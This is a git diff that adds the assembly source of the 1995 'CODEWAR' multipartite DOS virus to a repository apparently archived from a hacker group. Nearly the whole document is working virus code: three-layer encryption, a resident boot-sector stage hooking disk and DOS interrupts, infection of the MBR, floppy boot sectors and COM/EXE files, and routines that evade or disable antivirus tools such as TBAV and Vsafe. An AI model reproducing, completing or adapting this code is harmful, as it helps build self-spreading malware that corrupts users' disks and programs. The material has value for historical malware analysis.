projects / oweals / thc-archive.git / blobdiff
? search:
summary | shortlog | log | commit | commitdiff | tree
raw | inline | side by side
initial push of all stuff :)
[oweals/thc-archive.git] / Papers / codewar.txt
diff --git a/Papers/codewar.txt b/Papers/codewar.txt
new file mode 100644 (file)
index 0000000..5b80d4a
--- /dev/null
+++ b/Papers/codewar.txt
@@ -0,0 +1,1732 @@
+;-------------------------------------------------------------------------\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;                        C O D E W A R  V i r u s\r
+;\r
+;\r
+;                   Programming by Sirius & Mindmaniac\r
+;\r
+;\r
+;                             Germany 1995.\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;---------------------------------------------------------------------------\r
+;\r
+;\r
+;\r
+;  Please note:\r
+; --------------\r
+;\r
+;  This programme introduces into the technique of multipartite viruses.\r
+;  Pass to responsible people only!\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;   Features:\r
+; -------------\r
+;\r
+;  - Infection Type: - COM files,\r
+;                    - EXE files\r
+;                    - Master Boot Record (MBR) on Hard Disk Drives\r
+;                    - Boot Sector (BS) on Floppy Disk Drives\r
+;                      ( 1.44 Mb + 1.2 Mb )\r
+;\r
+;\r
+;  - Encryption:     3-layer-enryption (generic)\r
+;\r
+;  - Memory resident (Bootsector virus technique)\r
+;\r
+;  - Retro features.\r
+;\r
+;  - Similarities:   Alive (File Virus), Junkie (Multipartite Virus)\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;  Additional Notes:\r
+; -------------------\r
+;\r
+;  Infected objects are not detected by SSC Anti-Virus Scanner and\r
+;  Analyzer.\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+Ofs             equ     Offset\r
+Cmt             equ     Comment\r
+B               equ     byte ptr\r
+W               equ     word ptr\r
+\r
+Directory       STRUC\r
+DS_Drive        db ?\r
+DS_File_Name    db 8 dup(0)\r
+DS_File_Ext     db 3 dup(0)\r
+DS_File_Attr    db ?\r
+DS_Reserved     db 10 dup(0)\r
+DS_Time         dw ?\r
+DS_Date         dw ?\r
+DS_Start_Clust  dw ?\r
+DS_File_Size    dd ?\r
+Directory       ENDS\r
+\r
+FCB             STRUC\r
+FCB_Drive       db ?\r
+FCB_File_Name   db 8 dup(0)\r
+FCB_File_Ext    db 3 dup(0)\r
+FCB_Block       dw ?\r
+FCB_Rec_Size    dw ?\r
+FCB_File_Size   dd ?\r
+FCB_File_Date   dw ?\r
+FCB_File_Time   dw ?\r
+FCB_Reserved    db 8 dup(0)\r
+FCB_Record      db ?\r
+FCB_Random      dd ?\r
+FCB             ENDS\r
+\r
+DTA             STRUC\r
+DTA_Reserved    db 21 dup(0)\r
+DTA_File_Attr   db ?\r
+DTA_File_Time1  db ?                    ; = seconds\r
+DTA_File_Time2  db ?\r
+DTA_File_Date   dw ?\r
+DTA_File_Size   dd ?\r
+DTA_File_Name   db 13 dup(0)\r
+DTA             ENDS\r
+\r
+SFT             STRUC\r
+SFT_Reserved1   dw ?    ; 0\r
+SFT_Open_Mode   dw ?    ; 2\r
+SFT_File_Attr   db ?    ; 4\r
+SFT_Reserved2   dw ?    ; 5\r
+SFT_Reserved3   dd ?    ; 7\r
+SFT_Reserved4   dw ?    ; 11\r
+SFT_File_Time   dw ?    ; 13\r
+SFT_File_Date   dw ?    ; 15\r
+SFT_File_SizeLo dw ?    ; 17\r
+SFT_File_SizeHi dw ?    ; 19\r
+SFT_Curr_OfsLo  dw ?    ; 21\r
+SFT_Curr_OfsHi  dw ?    ; 23\r
+SFT_Reserved7   dw ?    ; 25\r
+SFT_Reserved8   dd ?    ; 27\r
+SFT_Reserved9   db ?    ; 31\r
+SFT_File_Name   db 8 dup(?)     ; 32 = 20h\r
+SFT_File_Ext    db 3 dup(?)     ; 40 = 28h\r
+SFT             ENDS\r
+\r
+ExeH            STRUC\r
+Buf_0h          dw 0    ; "MZ" oder "ZM" (selten)\r
+Buf_2h          dw 0    ; Last page size\r
+Buf_4h          dw 0    ; Size in pages\r
+Buf_6h          dw 0\r
+Buf_8h          dw 0\r
+Buf_ah          dw 0\r
+Buf_ch          dw 0\r
+Buf_eh          dw 0    ; SS\r
+Buf_10h         dw 0    ; SP\r
+Buf_12h         dw 0    ; CheckSum\r
+Buf_14h         dw 0    ; IP\r
+Buf_16h         dw 0    ; CS\r
+Buf_18h         dw 0    ; WINDOWS Marker\r
+ExeH            ENDS\r
+\r
+\r
+\r
+Flag_Exec_Infection     equ     1\r
+\r
+ofs                     equ     offset\r
+cmt                     equ     comment\r
+\r
+Reloc                   =       ofs Vir_Start\r
+Camouf                  =       2\r
+Enc_Word_Length         =       (Virus_Length/2)+1\r
+Virus_Length            =       4*512\r
+Header_Length           =       18h\r
+\r
+File_Type_COM           =       byte (Restore_COM-File_Type)-2\r
+File_Type_EXE           =       byte (Restore_EXE-File_Type)-2\r
+\r
+Media_Descriptor_144    =       0F0h\r
+Media_Descriptor_120    =       0F9h\r
+\r
+Vir_Len_Sectors         =       4\r
+\r
+Vir_Harddisk_Track      =       0\r
+Vir_Harddisk_Head       =       0\r
+Vir_Harddisk_Sector     =       4\r
+\r
+Vir_Floppy_120_Track    =       79\r
+Vir_Floppy_120_Head     =       1\r
+Vir_Floppy_120_Sector   =       6\r
+\r
+Vir_Floppy_144_Track    =       79\r
+Vir_Floppy_144_Head     =       1\r
+Vir_Floppy_144_Sector   =       15\r
+\r
+\r
+Names_HDD_Track         =       0\r
+Names_HDD_Head          =       0\r
+Names_HDD_Sector        =       3\r
+\r
+\r
+; in bytes\r
+\r
+F_Min_LengthCOM         =       3000\r
+F_Max_LengthCOM         =       50000\r
+\r
+; in pages\r
+\r
+F_Min_LengthEXE         =       6               ; = 3 kb\r
+F_Max_LengthEXE         =       2000            ; = 1000 kb\r
+\r
+\r
+Time_Stamp              =       13\r
+TOM_Decrement_value     =       5\r
+\r
+\r
+        .286\r
+CODE    SEGMENT BYTE PUBLIC 'CODE'\r
+ASSUME  CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING\r
+        ORG     0100h\r
+\r
+\r
+Sample:\r
+        jmp     Vir_Start\r
+\r
+;----------------------------------------------------------------------------\r
+; allways start at seg:0000\r
+\r
+        org     100h+ 1*16\r
+;----------------------------------------------------------------------------\r
+\r
+Vir_Start:\r
+\r
+;----------------------------------------------------------------------------\r
+; 1st encryption layer (outer)\r
+;----------------------------------------------------------------------------\r
+                cld\r
+                mov     CX,Enc_Word_Length\r
+\r
+                MOV     bp,1234h\r
+                ORG     $-2\r
+E1_Idx_Val      dw      ofs E1_Encrypted_Code\r
+\r
+                mov     ax,1234h\r
+                ORG     $-2\r
+E1_Key_Val      dw      0\r
+\r
+                db      081h,3eh\r
+E1_Dec_Loop:\r
+                XOR     Word Ptr cs:[bp],ax\r
+\r
+                inc     bp\r
+                inc     bp\r
+\r
+                dec     cx\r
+\r
+                or      cx,cx\r
+                jz      E1_Loop_done\r
+\r
+                jmp     short E1_Dec_Loop\r
+                db      09ah                    ;=CALL FAR\r
+E1_Loop_done:\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+E1_Encrypted_Code:\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; 2nd encryption layer (inner)\r
+;----------------------------------------------------------------------------\r
+                mov     cx,(Enc_Word_Length/2) +1\r
+\r
+                MOV     si,1234h\r
+                ORG     $-2\r
+E2_Idx_Val      dw      ofs E2_Encrypted_Code\r
+\r
+                mov     ax,1234h\r
+                ORG     $-2\r
+E2_Key_Val_1    dw      0\r
+\r
+                mov     bx,1234h\r
+                ORG     $-2\r
+E2_Key_Val_2    dw      0\r
+\r
+E2_Dec_Loop:\r
+                xor     w cs:[si],ax\r
+                inc     si\r
+                inc     si\r
+\r
+                xor     w cs:[si],bx\r
+                inc     si\r
+                inc     si\r
+\r
+                loop    short E2_Dec_Loop\r
+\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+E2_Encrypted_Code:\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; 3rd encryption layer (innerst)\r
+;----------------------------------------------------------------------------\r
+                mov     cx,(Enc_Word_Length/3)+1\r
+\r
+                MOV     si,1234h\r
+                ORG     $-2\r
+E3_Idx_Val      dw      ofs E3_Encrypted_Code\r
+\r
+                mov     ax,1234h\r
+                ORG     $-2\r
+E3_Key_Val_1    dw      0\r
+\r
+                mov     bx,1234h\r
+                ORG     $-2\r
+E3_Key_Val_2    dw      0\r
+\r
+                mov     dx,1234h\r
+                ORG     $-2\r
+E3_Key_Val_3    dw      0\r
+\r
+E3_Dec_Loop:\r
+                xor     w cs:[si],ax\r
+                inc     si\r
+                inc     si\r
+\r
+                xor     w cs:[si],bx\r
+                inc     si\r
+                inc     si\r
+\r
+                xor     w cs:[si],dx\r
+                inc     si\r
+                inc     si\r
+;Chg1+2\r
+                add     ax,1234h\r
+                ORG     $-2\r
+E3_Key_Change_1 dw      0\r
+\r
+                add     bx,1234h\r
+                ORG     $-2\r
+E3_Key_Change_2 dw      0\r
+\r
+                loop    short E3_Dec_Loop\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+E3_Encrypted_Code:\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+        cld\r
+        mov     ax,cs\r
+        or      ax,ax\r
+        jnz     Run_file\r
+        jmp     Its_boottime\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; Restore program-header, the registers and go back to the program\r
+\r
+Exit_File:\r
+                pop     es ds\r
+\r
+\r
+                db      0EBh                    ; JMP-short-opcode\r
+File_Type       db      File_Type_COM\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; restore the COM-host-file\r
+\r
+Restore_COM:\r
+        MOV     DI,100h\r
+        push    di\r
+\r
+        MOV     Word Ptr cs:[DI],1234h\r
+        ORG     $-2\r
+Rest1   dw      0c3c3h\r
+\r
+        MOV     byte Ptr cs:[DI+2],12h\r
+        ORG     $-1\r
+Rest2   db      0c3h\r
+\r
+ZeroRegsForHost:\r
+        mov     cx,8\r
+nullup: push    0\r
+        loop    nullup\r
+        popa\r
+\r
+        ret\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; restore the EXE-host-file\r
+\r
+Restore_EXE:\r
+        mov     ax,ds                           ; DS = PSP !\r
+        add     ax,10h                          ; + 100h bytes of PSP\r
+        add     cs:[bx+ofs Old_CS -Reloc],ax    ; = new CS\r
+        add     ax,0000                         ; + old SS\r
+        org     $-2\r
+Old_SS  dw      ?\r
+        cli\r
+        mov     ss,ax                           ; set SS\r
+        mov     sp,0000                         ; set SP\r
+        org     $-2\r
+Old_SP  dw      ?\r
+        sti\r
+\r
+        call    ZeroRegsForHost\r
+\r
+        db      0EAh                            ; = JMP Old_CS:Old_IP\r
+\r
+; In an EXE - header-values are stored here\r
+\r
+Old_ExeValues:\r
+Old_IP          dw      0\r
+Old_CS          dw      0\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+        db      " PSYCHo-TECH GMBH 1995 "\r
+\r
+;----------------------------------------------------------------------------\r
+Run_File:\r
+\r
+; relocate\r
+        CALL    Delta\r
+Delta:\r
+        POP     BX\r
+        SUB     BX,1234h\r
+        ORG     $-2\r
+        dw      ofs Delta -Reloc\r
+\r
+; save PSP\r
+        push    ds es\r
+\r
+\r
+; assume segments\r
+        push    cs cs\r
+        pop     ds es\r
+\r
+; prepare the retf to Exit_File\r
+\r
+        push    cs\r
+        lea     ax,cs:[bx+ofs Exit_File -Reloc]\r
+        push    ax\r
+\r
+; change CS, so we start at ofs 0 not 100h\r
+\r
+        mov     ax,cs\r
+        SHR     BX,4\r
+        ADD     AX,BX\r
+        PUSH    AX\r
+        MOV     AX,ofs Continue -Reloc\r
+        PUSH    AX\r
+        RETF\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Gag:\r
+        push    ax ds\r
+        in      al,40h\r
+        test    al,1\r
+        jz      Skip_Gag\r
+\r
+        mov     ax,0b800h\r
+        mov     ds,ax\r
+        mov     word ptr ds:[(79*2)],00cf9h     ;= lightred point "ù"\r
+Skip_Gag:\r
+        pop     ds ax\r
+        ret\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Its_boottime:\r
+\r
+        call    Gag\r
+\r
+        xor     di,di\r
+        MOV     DS,DI\r
+\r
+        mov     si,7c00h+512\r
+\r
+; decrement RAM by xx kB\r
+\r
+        SUB     Word Ptr DS:[0413h],TOM_Decrement_value\r
+        MOV     AX,DS:[0413h]\r
+        MOV     BX,40h\r
+        MUL     BX\r
+        MOV     ES,AX\r
+\r
+; move virus to TOM (xxxx bytes)\r
+\r
+        MOV     CX,Virus_Length\r
+        CLD\r
+        REPZ    MOVSB\r
+\r
+; set new INT 13h and 1Ch\r
+\r
+        CLI\r
+\r
+        MOV     SI,4*13h\r
+        MOV     DI,ofs Old_Int_13 -Reloc\r
+        MOV     AX,ofs New_Int_13 -Reloc\r
+        CALL    Get_Set_Int\r
+\r
+        MOV     Byte Ptr ES:[ofs Got_Int_21 -Reloc],0\r
+\r
+        MOV     SI,4*1ch\r
+        MOV     DI,ofs Old_Int_1c -Reloc\r
+        MOV     AX,ofs New_Int_1c -Reloc\r
+        CALL    Get_Set_Int\r
+\r
+        STI\r
+\r
+; save INT 21h\r
+\r
+        MOV     DI,ofs Old_Int_21 -Reloc\r
+        MOV     SI,4*21h\r
+        MOVSW\r
+        MOVSW\r
+\r
+        mov     di,7c00h\r
+\r
+; prepare RETF to orig PAR/BS\r
+\r
+        PUSH    CS      ;=0\r
+        PUSH    DI      ;=7c00h\r
+\r
+        push    es\r
+        push    ofs Boot_Finish -Reloc\r
+\r
+        PUSH    CS\r
+        POP     ES\r
+\r
+; restore the JUMP-Word and the patched PAR/BS\r
+\r
+        MOV     SI,7c00h + 512 + BS_First_word -Reloc\r
+        MOVSW\r
+\r
+        mov     di,7c00h + 60h   ; offset of the patch-area\r
+        CALL    Call_Move_20\r
+\r
+; Patch the TBAV immunized partition\r
+\r
+        cmp     w cs:[7c00h+0dfh],"hT"\r
+        jne     no_TB_partition\r
+        mov     b cs:[7c00h+73h],0\r
+\r
+no_TB_partition:\r
+\r
+; goto Boot_Finish / infect C:\r
+\r
+        retf\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+New_Int_13:\r
+\r
+        cmp     ax,0201h                        ; reading ?\r
+        JNZ     Jump_Old_Int_13\r
+\r
+        CMP     CX,0001h                        ; sector 1 and Track 0 ?\r
+        JNZ     Jump_Old_Int_13\r
+\r
+        or      dh,dh                           ; head 0 ?\r
+        jnz     Jump_Old_Int_13\r
+\r
+        pusha\r
+        PUSH    DS\r
+        PUSH    ES\r
+\r
+        CALL    Int13_Works\r
+\r
+        POP     ES\r
+        POP     DS\r
+        popa\r
+\r
+Jump_Old_Int_13:\r
+        jmp     dword ptr cs:(ofs Old_Int_13 -Reloc)\r
+\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Call_Old_Int_13:\r
+        PUSHF\r
+        call    dword ptr cs:(ofs Old_Int_13 -Reloc)\r
+        RET\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+        db      " >>> BRAVEd DANGER 4 BRAVE PEOPLe <<< "\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Continue:\r
+        PUSH    DS\r
+        PUSH    ES\r
+\r
+        XOR     AX,AX\r
+        MOV     DS,AX\r
+\r
+        PUSH    CS\r
+        POP     ES\r
+\r
+; save int 13h\r
+\r
+        MOV     DI,ofs Old_Int_13 -Reloc\r
+        MOV     SI,4*13h\r
+        CLD\r
+        MOVSW\r
+        MOVSW\r
+        JMP     Short Read_Drive_C\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Boot_Finish:\r
+        PUSH    DS\r
+        PUSH    ES\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Read_Drive_C:\r
+        MOV     AH,02h\r
+        MOV     DL,80h\r
+\r
+        CALL    Int13_Works     ; infect drive C\r
+\r
+        POP     ES\r
+        POP     DS\r
+\r
+        XOR     AX,AX\r
+        XOR     BX,BX\r
+        retf\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Int13_Works:\r
+\r
+        PUSH    CS\r
+        POP     DS\r
+        PUSH    CS\r
+        POP     ES\r
+\r
+        CALL    Read_or_Write_BS_from_A\r
+        jnb     oky                             ; Goto_Ret\r
+        jmp     Goto_Ret\r
+oky:\r
+\r
+\r
+        MOV     DI,ofs Buffer + 60h -Reloc\r
+\r
+; check if BS is infected\r
+\r
+        CMP     Word Ptr [SI],05EEBh    ; SI=@buffer\r
+        JNZ     BS_not_infected\r
+\r
+        CMP     Word Ptr [DI],0FF33h    ; == xor di,di\r
+        JZ      Goto_Ret\r
+\r
+BS_not_infected:\r
+\r
+; test if it is Harddisk or floppy\r
+\r
+        cmp     dl,79h\r
+        ja      Not_Floppy\r
+\r
+\r
+; test if HD 1.44 (=F0) or HD 1.2 (=F9) floppy\r
+\r
+        CMP     Byte Ptr DS:[ofs Buffer+15h -Reloc],Media_Descriptor_144\r
+        JZ      Found_ID_F0\r
+\r
+        CMP     Byte Ptr DS:[ofs Buffer+15h -Reloc],Media_Descriptor_120\r
+        JNZ     Goto_Ret\r
+\r
+Large_floppy:\r
+        MOV     CL,Vir_Floppy_120_Sector\r
+        JMP     Short Floppy_Disk\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; 1.44 floppy found\r
+\r
+Found_ID_F0:\r
+        MOV     AX,40h\r
+        MOV     DS,AX\r
+\r
+; 0:490h == AT Drive 0 status\r
+\r
+        CMP     Byte Ptr DS:[0090h],97h\r
+        JZ      Large_Floppy\r
+\r
+; it is 1.44 Mb\r
+\r
+        MOV     CL,Vir_Floppy_144_Sector\r
+\r
+Floppy_Disk:\r
+        PUSH    CS\r
+        POP     DS\r
+\r
+        MOV     CH,Vir_Floppy_120_Track\r
+        JMP     Short Head_01\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Not_floppy:\r
+        MOV     CX,Vir_Harddisk_Sector\r
+        JMP     Short Head_00\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Head_01:\r
+        MOV     DH,Vir_Floppy_120_Head\r
+Head_00:\r
+        MOV     DS:[ofs Ptc_CX -Reloc],CX   ; patch the PAR\r
+        MOV     DS:[ofs Ptc_DX -Reloc],DX\r
+\r
+        PUSH    DX\r
+        PUSH    CX\r
+        PUSH    SI\r
+        PUSH    DI\r
+\r
+; Move the JMP-Op to the beginning of BS/PAR\r
+\r
+        MOV     DI,ofs BS_first_word -Reloc     ; SI=ofs buffer\r
+        MOVSW\r
+        POP     SI\r
+\r
+        CALL    Call_Move_20\r
+\r
+        MOV     SI,DI\r
+        POP     DI\r
+        MOVSW\r
+\r
+        add     di,60h-2\r
+        CALL    Call_Move_20                    \r
+\r
+; write BS\r
+\r
+        MOV     AX,0301h\r
+        PUSH    AX\r
+        CALL    Read_or_Write_BS_from_A\r
+\r
+        POP     AX\r
+        POP     CX\r
+        POP     DX\r
+\r
+        MOV     AL,Vir_Len_Sectors\r
+        MOV     BX,ofs Buffer -Reloc\r
+        JB      Goto_Ret\r
+\r
+\r
+        MOV     Word Ptr DS:[ofs E1_Idx_Val -Reloc],7c00h +512+E1_Encrypted_Code -Reloc -Camouf\r
+        MOV     Word Ptr DS:[ofs E2_Idx_Val -Reloc],7c00h +512+E2_Encrypted_Code -Reloc\r
+        MOV     Word Ptr DS:[ofs E3_Idx_Val -Reloc],7c00h +512+E3_Encrypted_Code -Reloc\r
+\r
+\r
+        CALL    Encrypt_Virus\r
+\r
+        CALL    Call_Old_Int_13\r
+Goto_Ret:\r
+        RET\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; read the PAR/BS from drive\r
+;----------------------------------------------------------------------------\r
+\r
+Read_or_Write_BS_from_A:\r
+        MOV     AL,01h\r
+        MOV     CX,0001h\r
+        MOV     DH,0\r
+        MOV     BX,ofs Buffer -Reloc\r
+        MOV     SI,BX\r
+\r
+        PUSH    DX\r
+        CALL    Call_Old_Int_13\r
+        POP     DX\r
+\r
+        RET\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Call_Move_20:\r
+        MOV     CX,32\r
+        CLD\r
+        REPZ    MOVSb\r
+        RET\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Get_Set_Int:\r
+\r
+        PUSH    SI\r
+        MOVSW\r
+        MOVSW\r
+        POP     SI\r
+        MOV     [SI],AX\r
+        MOV     [SI+2],ES\r
+        RET\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Get_Random:\r
+\r
+;;        xor     ax,ax\r
+;;        ret\r
+\r
+        push    cx dx\r
+\r
+        in      al,40h\r
+        mov     cl,al\r
+\r
+        xor     ax,ax\r
+        int     1ah\r
+\r
+        in      al,40h\r
+        mov     ah,al\r
+\r
+        in      al,40h\r
+        rol     ax,cl\r
+\r
+        pop     dx cx\r
+        ret\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;============================================================================\r
+Encrypt_Virus:\r
+\r
+        pusha\r
+        push    ds es\r
+\r
+; get (random) key-values\r
+\r
+; L1\r
+        call    Get_Random\r
+        MOV     word ptr cs:[ofs E1_Key_Val -Reloc],ax\r
+\r
+; L2\r
+        call    Get_Random\r
+        MOV     word ptr cs:[ofs E2_Key_Val_1 -Reloc],ax\r
+\r
+        call    Get_Random\r
+        MOV     word ptr cs:[ofs E2_Key_Val_2 -Reloc],ax\r
+\r
+; L3\r
+        call    Get_Random\r
+        MOV     word ptr cs:[ofs E3_Key_Val_1 -Reloc],ax\r
+\r
+        call    Get_Random\r
+        MOV     word ptr cs:[ofs E3_Key_Val_2 -Reloc],ax\r
+\r
+        call    Get_Random\r
+        MOV     word ptr cs:[ofs E3_Key_Val_3 -Reloc],ax\r
+\r
+        call    Get_Random\r
+        MOV     word ptr cs:[ofs E3_Key_Change_1 -Reloc],ax\r
+\r
+        call    Get_Random\r
+        MOV     word ptr cs:[ofs E3_Key_Change_2 -Reloc],ax\r
+\r
+\r
+; move bytes\r
+\r
+        PUSH    CS\r
+        POP     ES\r
+\r
+        MOV     SI,1234h\r
+        org     $-2\r
+        dw      0\r
+\r
+        MOV     DI,ofs Buffer -Reloc\r
+        MOV     CX,(ofs Encrypted_Code_End - ofs Vir_Start)\r
+        REPZ    MOVSB\r
+\r
+\r
+; fill\r
+\r
+        pusha\r
+        mov     cx,2*80\r
+Fill_random:\r
+        in      al,40h\r
+        cld\r
+        stosb\r
+        loop    Fill_random\r
+        popa\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; encrypt innerst layer E3\r
+\r
+        MOV     w ax,cs:[ofs E3_Key_Val_1 -Reloc]\r
+        MOV     w bx,cs:[ofs E3_Key_Val_2 -Reloc]\r
+        MOV     w dx,cs:[ofs E3_Key_Val_3 -Reloc]\r
+\r
+;chg1+2\r
+        MOV     w di,cs:[ofs E3_Key_Change_1 -Reloc]\r
+        MOV     w bp,cs:[ofs E3_Key_Change_2 -Reloc]\r
+\r
+        MOV     si,ofs Buffer -Reloc\r
+        ADD     si,ofs E3_Encrypted_Code -Reloc\r
+\r
+        MOV     CX,(Enc_Word_Length/3) +1\r
+\r
+C3_Enc_Loop:\r
+        XOR     cs:[si],ax\r
+        INC     si\r
+        INC     si\r
+\r
+        XOR     cs:[si],bx\r
+        INC     si\r
+        INC     si\r
+\r
+        XOR     cs:[si],dx\r
+        INC     si\r
+        INC     si\r
+;chg1\r
+        add     ax,di\r
+;chg2\r
+        add     bx,bp\r
+\r
+        LOOP    C3_Enc_Loop\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; encrypt inner layer E2\r
+\r
+        MOV     w ax,cs:[ofs E2_Key_Val_1 -Reloc]\r
+        MOV     w bx,cs:[ofs E2_Key_Val_2 -Reloc]\r
+\r
+        MOV     si,ofs Buffer -Reloc\r
+        ADD     si,ofs E2_Encrypted_Code -Reloc\r
+\r
+        MOV     CX,(Enc_Word_Length/2) +1\r
+\r
+C2_Enc_Loop:\r
+        XOR     cs:[si],ax\r
+        INC     si\r
+        INC     si\r
+\r
+        XOR     cs:[si],bx\r
+        INC     si\r
+        INC     si\r
+\r
+        LOOP    C2_Enc_Loop\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; encrypt outer layer E1\r
+\r
+        MOV     word ptr bx,cs:[ofs E1_Key_Val -Reloc]\r
+\r
+        MOV     DI,ofs Buffer -Reloc\r
+        ADD     DI,ofs E1_Encrypted_Code -Reloc\r
+\r
+        MOV     CX,Enc_Word_Length\r
+\r
+Enc_Loop:\r
+        XOR     cs:[DI],BX\r
+        INC     DI\r
+        INC     DI\r
+        LOOP    Enc_Loop\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+Mult_POP:\r
+        pop     es ds\r
+        popa\r
+\r
+        RET\r
+;============================================================================\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+New_Int_1c:\r
+        CMP     Byte Ptr CS:[ofs Got_Int_21 -Reloc],1\r
+        JZ      Jump_Int_1c\r
+\r
+        pusha\r
+        push    ds es\r
+\r
+        MOV     SI,4*21h\r
+        XOR     AX,AX\r
+        MOV     DS,AX\r
+\r
+; load int 20h seg and compare if below 800h\r
+\r
+        MOV     AX,DS:[4*20h +2]\r
+\r
+        CMP     AX,0000h\r
+        JZ      Exit_Int_1c\r
+\r
+        CMP     AX,800h\r
+        JA      Exit_Int_1c\r
+\r
+; cmp with int 21h seg\r
+\r
+        CMP     [SI+02h],AX\r
+        JNZ     Exit_Int_1c\r
+\r
+; cmp with int 27h seg\r
+\r
+        CMP     DS:[4*27h +2],AX\r
+        JNZ     Exit_Int_1c\r
+\r
+; cmp with int 2Fh seg\r
+\r
+        CMP     DS:[4*2Fh +2],AX\r
+        JNZ     Exit_Int_1c\r
+\r
+; ok, now hook int 21h\r
+\r
+        CLI\r
+        MOV     DI,ofs Old_Int_21 -Reloc\r
+        PUSH    CS\r
+        POP     ES\r
+        MOV     AX,ofs New_Int_21 -Reloc\r
+        CALL    Get_Set_Int\r
+\r
+; set the flag for it\r
+        MOV     Byte Ptr CS:[ofs Got_Int_21 -Reloc],01h\r
+        STI\r
+\r
+; get int 2f vector\r
+\r
+        push    0\r
+        pop     ds\r
+        mov     w ax,ds:[4*2fh]\r
+        mov     w cs:[ofs Old_Int_2f -Reloc],ax\r
+        mov     w ax,ds:[4*2fh+2]\r
+        mov     w cs:[ofs Old_Int_2f -Reloc+2],ax\r
+\r
+\r
+\r
+Exit_Int_1c:\r
+\r
+        pop     es ds\r
+        popa\r
+\r
+Jump_Int_1c:\r
+        jmp     dword ptr cs:(ofs Old_int_1c -Reloc)\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+New_Int_21:\r
+\r
+\r
+IF      Flag_Exec_Infection\r
+        CMP     AX,4B00h\r
+        JZ      Control_Operation\r
+ENDIF\r
+\r
+\r
+        CMP     AH,3Dh\r
+        JZ      Control_Operation\r
+\r
+Exit_Int_21:\r
+        jmp     dword ptr cs:(ofs Old_Int_21 -Reloc)\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Control_Operation:\r
+\r
+        pusha\r
+        push    ds es\r
+\r
+Not_Ext_Open:\r
+        xchg    ax,cx\r
+        xor     ax,ax\r
+\r
+        call    Deinstall_Vsafe\r
+\r
+; Hook int 24h\r
+\r
+        PUSH    DS\r
+        MOV     DS,AX\r
+        LES     AX,DS:[4*24h]\r
+        MOV     Word Ptr DS:[4*24h], ofs New_Int_24 -Reloc\r
+        MOV     DS:[4*24h +2],CS\r
+        POP     DS\r
+\r
+        PUSH    ES\r
+        PUSH    AX\r
+\r
+; open file\r
+\r
+        MOV     AX,3D00h\r
+        call    Call_Old_Int21\r
+        jb      File_Error\r
+\r
+        mov     bx,ax\r
+\r
+        PUSH    CS\r
+        POP     DS\r
+\r
+; get SFT\r
+\r
+        PUSH    BX\r
+        MOV     AX,1220h\r
+        call    Call_Old_Int2F                 ; INT     2Fh\r
+\r
+        MOV     AX,1216h\r
+        MOV     BL,ES:[DI]\r
+        call    Call_Old_Int2F                 ; INT     2Fh\r
+        POP     BX\r
+\r
+        JB      Close_Exit\r
+\r
+; skip AV-programs ?\r
+\r
+        call    Check_If_AV_Name\r
+        jz      goto_close_exit\r
+\r
+\r
+; test if executable-file\r
+\r
+        CMP     Word Ptr ES:[DI+28h],"OC"\r
+        JZ      Is_COM\r
+\r
